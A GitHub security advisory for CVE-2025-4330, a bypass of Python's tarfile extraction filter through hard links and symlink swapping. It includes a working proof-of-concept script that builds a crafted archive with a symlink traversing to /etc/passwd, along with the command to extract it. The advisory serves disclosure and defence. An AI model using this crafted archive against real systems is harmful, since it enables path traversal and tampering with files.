Skip to content

Python Tar Filter Bypass Vulnerability

High
rcorrea35 published GHSA-7fj8-pjw2-r9vh Jul 31, 2025

Package

No package listed

Affected versions

3.8.17+, 3.9.17+, 3.10.12+, 3.11.4+, 3.12+ with the introduction of PEP-706

Patched versions

None

Description

Summary

Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a filter to be set to improve the safety of using these methods.

A bug in how links are processed allows for the filter to be bypassed in some limited cases, and allows for objects to be created under directories that differ to their intended location.

The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.

The bypass does not apply to the hard link path validation, but does affect other validation that may occur - such as excluding file types, changing modes, etc.

Severity

Moderate - Should be fixed, but not serious in nature.

1. Create the tar file

In Python run the following code to create a tar file that demonstrates the vulnerability. This tar file will create a symlink that bypasses symlink link destination checking.

import tarfile
with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
    # Create a deep directory structure so the c/escape symlink stays inside the path
    a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(a)
    # Create a dummy file that creates the b directory (I am lazy)
    b = tarfile.TarInfo("b/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(b)
    # Point "c" to the bottom of the tree in "a"
    ca = tarfile.TarInfo("c")
    ca.type = tarfile.SYMTYPE
    ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
    tar.addfile(ca)
    # Create a symlink. At this point the link should point to a non-existant location under "a"
    cescape = tarfile.TarInfo("c/escape")
    cescape.type = tarfile.SYMTYPE
    cescape.linkname = "../../../../../../../../etc/passwd"
    tar.addfile(cescape)
    # Move "c" to point to "b". This means "c/escape" no longer exists.
    cb = tarfile.TarInfo("c")
    cb.type = tarfile.SYMTYPE
    cb.linkname = "b"
    tar.addfile(cb)
    # Attempt to create a hard link to "c/escape". Since it doesn't exist it
    # will basically create "cescape" but at "boom". Which means the directory
    # traversal now escapes the destination path.
    boom = tarfile.TarInfo("boom")
    boom.type = tarfile.LNKTYPE
    boom.linkname = "c/escape"
    tar.addfile(boom)

2. Extract the tar file

Change into a new directory (e.g. mkdir poc; cd poc) and run the following in Python to
decompress the tar created above.

import tarfile
tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")

Further Analysis

When extracting a hard link from a tar archive using extractall() or extract() the function TarFile.makelink() is called.

Before calling os.link() to create a hard link it checks for the existence of the link target by calling os.path.lexist().

If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using TarFile._find_link_target() and extracted directly using TarFile._extract_member() at the location of where the hard link would have been created.

This call to TarFile._extract_member() does not pass through the filter method.

This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.

TarFile._find_link_target() is challenging to call with a hard link. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means if extractall() is being used the link target member must successfully be extractable. This is not required if extract() is used.

This technique can not be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target being present. However this attribute is only set in TarFile._get_extract_tarinfo(), which is not called.

Timeline

Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE ID

CVE-2025-4330

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

Credits